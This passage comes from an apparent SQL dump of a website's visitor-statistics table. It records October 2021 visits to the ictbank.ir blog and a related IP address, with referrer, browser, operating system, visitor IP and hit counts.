(14158,'2021-10-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.71','000',0,6,0),
(14159,'2021-10-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(14160,'2021-10-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.139','000',0,2,0),
(14161,'2021-10-07','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.207.72.210','000',0,2,0),
(14162,'2021-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.224.252.11','000',0,1,0),
(14163,'2021-10-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.35','000',0,20,0),
(14164,'2021-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.217.154','000',0,2,0),
(14165,'2021-10-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.247','000',0,2,0),
(14166,'2021-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.56.183','000',0,1,0),
(14167,'2021-10-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.54.69.52','000',0,2,0),
(14168,'2021-10-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14169,'2021-10-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.186.246','000',0,2,0),
(14170,'2021-10-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(14171,'2021-10-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14172,'2021-10-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14173,'2021-10-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14174,'2021-10-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(14175,'2021-10-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(14176,'2021-10-07','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','59.19.148.99','000',0,2,0),
(14177,'2021-10-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.74.164.235','000',0,2,0),
(14178,'2021-10-08','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','138.68.180.18','000',0,1,0),
(14179,'2021-10-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.245.177.233','000',0,2,0),
(14180,'2021-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(14181,'2021-10-08','design-arena.ir/','Safari','Windows','5.0',NULL,NULL,'','185.220.102.254','000',0,2,0),
(14182,'2021-10-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','31.11.36.217','000',0,1,0),
(14183,'2021-10-08','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','160.116.77.64','000',0,21,0),
(14184,'2021-10-08','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.113.252','000',0,2,0),
(14185,'2021-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.130.171','000',0,2,0),
(14186,'2021-10-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','164.90.235.83','000',0,1,0),
(14187,'2021-10-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(14188,'2021-10-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','143.198.40.227','000',0,1,0),
(14189,'2021-10-08','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,2,0),
(14190,'2021-10-08','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','173.213.84.171','000',0,3,0),
(14191,'2021-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.86.134.90','000',0,1,0),
(14192,'2021-10-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14193,'2021-10-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14194,'2021-10-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.174.139.134','000',0,2,0),
(14195,'2021-10-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(14196,'2021-10-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(14197,'2021-10-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14198,'2021-10-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14199,'2021-10-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(14200,'2021-10-08','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,3,0),
(14201,'2021-10-08','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','167.71.211.244','000',0,2,0),
(14202,'2021-10-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14203,'2021-10-09','ictbank.ir/','Firefox','Windows','6.0',NULL,NULL,'','109.70.100.25','000',0,1,0),
(14204,'2021-10-09','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','178.214.247.130','000',0,2,0),
(14205,'2021-10-09','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(14206,'2021-10-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14207,'2021-10-09','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','150.255.80.143','000',0,1,0),
(14208,'2021-10-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','50.31.21.4','000',0,2,0),
(14209,'2021-10-09','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.64','000',0,4,0),
(14210,'2021-10-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14211,'2021-10-09','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.11','000',0,1,0),
(14212,'2021-10-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(14213,'2021-10-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.227.236.232','000',0,21,0),
(14214,'2021-10-09','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','154.202.100.101','000',0,2,0),
(14215,'2021-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.28.154','000',0,2,0),
(14216,'2021-10-09','http://adina.pt/','Chrome','Android','10',NULL,NULL,'','2.180.21.140','000',0,6,0),
(14217,'2021-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.19.240','000',0,1,0),
(14218,'2021-10-09','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,2,0),
(14219,'2021-10-09','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.40','000',0,1,0),
(14220,'2021-10-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.49.112.76','000',0,1,0),
(14221,'2021-10-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(14222,'2021-10-10','http://adina.pt/','Chrome','Android','10',NULL,NULL,'','2.180.21.140','000',0,4,0),
(14223,'2021-10-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','49.86.179.156','000',0,1,0),
(14224,'2021-10-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','180.245.116.51','000',0,1,0),
(14225,'2021-10-10','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
(14226,'2021-10-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14227,'2021-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(14228,'2021-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.199.107.162','000',0,2,0),
(14229,'2021-10-10','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','167.172.177.63','000',0,1,0),
(14230,'2021-10-10','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','196.218.26.38','000',0,1,0),
(14231,'2021-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(14232,'2021-10-10','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.236.167.159','000',0,1,0),
(14233,'2021-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.70.133','000',0,1,0),
(14234,'2021-10-10','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.174.226.149','000',0,6,0),
(14235,'2021-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.35.82.20','000',0,2,0),
(14236,'2021-10-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14237,'2021-10-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(14238,'2021-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.213.211','000',0,1,0),
(14239,'2021-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14240,'2021-10-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,2,0),
(14241,'2021-10-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14242,'2021-10-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(14243,'2021-10-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(14244,'2021-10-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(14245,'2021-10-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(14246,'2021-10-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.62.149.29','000',0,1,0),
(14247,'2021-10-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(14248,'2021-10-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14249,'2021-10-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(14250,'2021-10-11','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','90.82.224.49','000',0,1,0),
(14251,'2021-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.133.137','000',0,2,0),
(14252,'2021-10-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.170','000',0,2,0),
(14253,'2021-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.66.88.100','000',0,2,0),
(14254,'2021-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.213.78','000',0,1,0),
(14255,'2021-10-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14256,'2021-10-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14257,'2021-10-11','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.44.44','000',0,1,0),
(14258,'2021-10-11','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.103.173','000',0,1,0),
(14259,'2021-10-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.188.182.61','000',0,2,0),
(14260,'2021-10-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14261,'2021-10-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(14262,'2021-10-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14263,'2021-10-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14264,'2021-10-11','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','58.137.113.155','000',0,1,0),
(14265,'2021-10-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(14266,'2021-10-11','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','189.120.75.164','000',0,1,0),
(14267,'2021-10-11','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','46.38.232.96','000',0,1,0),
(14268,'2021-10-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(14269,'2021-10-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(14270,'2021-10-12','ictbank.ir/','Firefox','Windows','6.3',NULL,NULL,'','193.189.100.198','000',0,1,0),
(14271,'2021-10-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(14272,'2021-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(14273,'2021-10-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14274,'2021-10-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(14275,'2021-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.131.181','000',0,2,0),
(14276,'2021-10-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(14277,'2021-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.108.52.83','000',0,2,0),
(14278,'2021-10-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,4,0),
(14279,'2021-10-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.7','000',0,2,0),
(14280,'2021-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.26.140','000',0,1,0),
(14281,'2021-10-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,2,0),
(14282,'2021-10-12','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','167.172.177.63','000',0,1,0),
(14283,'2021-10-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.4.79','000',0,1,0),
(14284,'2021-10-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.6','000',0,2,0),
(14285,'2021-10-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','157.245.79.36','000',0,1,0),
(14286,'2021-10-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(14287,'2021-10-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14288,'2021-10-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(14289,'2021-10-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.11.108.101','000',0,2,0),
(14290,'2021-10-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.146','000',0,5,0),
(14291,'2021-10-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(14292,'2021-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','181.167.32.83','000',0,6,0),
(14293,'2021-10-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,2,0),
(14294,'2021-10-13','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','198.98.48.112','000',0,3,0),
(14295,'2021-10-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14296,'2021-10-13','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(14297,'2021-10-13','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','103.77.235.35','000',0,5,0),
(14298,'2021-10-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14299,'2021-10-13','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.70.176','000',0,1,0),
(14300,'2021-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.165.109','000',0,2,0),
(14301,'2021-10-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(14302,'2021-10-13','http://ictbank.ir/blog/','Firefox','Linux','Unknown',NULL,NULL,'','31.59.143.77','000',0,61,0),
(14303,'2021-10-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','103.237.101.15','000',0,2,0),
(14304,'2021-10-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.9.73.95','000',0,2,0),
(14305,'2021-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.70.71','000',0,1,0),
(14306,'2021-10-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.63.163.114','000',0,4,0),
(14307,'2021-10-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
(14308,'2021-10-13','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','3.250.30.50','000',0,2,0),
(14309,'2021-10-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.244.4.202','000',0,2,0),
(14310,'2021-10-13','http://www.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,2,0),
(14311,'2021-10-13','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.154.223.5','000',0,1,0),
(14312,'2021-10-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(14313,'2021-10-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14314,'2021-10-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,2,0),
(14315,'2021-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.174.10.220','000',0,2,0),
(14316,'2021-10-14','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.77.228.19','000',0,2,0),
(14317,'2021-10-14','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','176.34.220.148','000',0,1,0),
(14318,'2021-10-14','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','176.34.223.200','000',0,2,0),
(14319,'2021-10-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14320,'2021-10-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.57','000',0,1,0),
(14321,'2021-10-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.242.10.190','000',0,2,0),
(14322,'2021-10-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.107','000',0,1,0),
(14323,'2021-10-14','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.3.178.31','000',0,13,0),
(14324,'2021-10-14','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','223.29.253.164','000',0,2,0),
(14325,'2021-10-14','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.253.9.145','000',0,1,0),
(14326,'2021-10-14','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.229.206.79','000',0,2,0),
(14327,'2021-10-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.165.85.46','000',0,1,0),
(14328,'2021-10-14','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.243.172.70','000',0,2,0),
(14329,'2021-10-14','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(14330,'2021-10-14','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.33.65','000',0,4,0),
(14331,'2021-10-14','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.41.193','000',0,3,0),
(14332,'2021-10-14','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.116.25','000',0,2,0),
(14333,'2021-10-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(14334,'2021-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.120.96','000',0,2,0),
(14335,'2021-10-14','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14336,'2021-10-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','109.201.38.91','000',0,2,0),
(14337,'2021-10-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.245.22','000',0,2,0),
(14338,'2021-10-14','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.72','000',0,4,0),
(14339,'2021-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.106.151','000',0,1,0),
(14340,'2021-10-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,4,0),
(14341,'2021-10-14','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.136','000',0,2,0),
(14342,'2021-10-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(14343,'2021-10-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14344,'2021-10-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,2,0),
(14345,'2021-10-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(14346,'2021-10-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,2,0),
(14347,'2021-10-15','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','182.50.135.81','000',0,1,0),
(14348,'2021-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(14349,'2021-10-15','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','111.224.249.76','000',0,1,0),
(14350,'2021-10-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.16','000',0,2,0),
(14351,'2021-10-15','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','58.137.113.155','000',0,1,0),
(14352,'2021-10-15','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,4,0),
(14353,'2021-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.19.123','000',0,2,0),
(14354,'2021-10-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,3,0),
(14355,'2021-10-15','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.254.186.81','000',0,1,0),
(14356,'2021-10-15','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,4,0),
(14357,'2021-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.77.84','000',0,1,0),
(14358,'2021-10-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,4,0),
(14359,'2021-10-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14360,'2021-10-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14361,'2021-10-15','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.249.215.203','000',0,1,0),
(14362,'2021-10-15','http://ictbank.ir/blog','Chrome','iOS','15.0',NULL,NULL,'','188.212.242.8','000',0,3,0),
(14363,'2021-10-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(14364,'2021-10-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,2,0),
(14365,'2021-10-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14366,'2021-10-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','148.72.31.225','000',0,1,0),
(14367,'2021-10-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(14368,'2021-10-15','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','167.172.177.63','000',0,1,0),
(14369,'2021-10-15','http://ictbank.ir/blog','Chrome','iOS','15.0',NULL,NULL,'','188.212.246.254','000',0,1,0),
(14370,'2021-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(14371,'2021-10-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.243.210.40','000',0,1,0),
(14372,'2021-10-16','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.180','000',0,1,0),
(14373,'2021-10-16','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.183','000',0,1,0),
(14374,'2021-10-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14375,'2021-10-16','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(14376,'2021-10-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.244.115.69','000',0,1,0),
(14377,'2021-10-16','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.244.178.29','000',0,1,0),
(14378,'2021-10-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14379,'2021-10-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(14380,'2021-10-16','http://www.ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','81.69.191.124','000',0,4,0),
(14381,'2021-10-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','52.49.254.86','000',0,1,0),
(14382,'2021-10-16','http://ictbank.ir/blog','Chrome','OS X','10.9.0',NULL,NULL,'','195.78.54.101','000',0,2,0),
(14383,'2021-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.196.159','000',0,2,0),
(14384,'2021-10-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
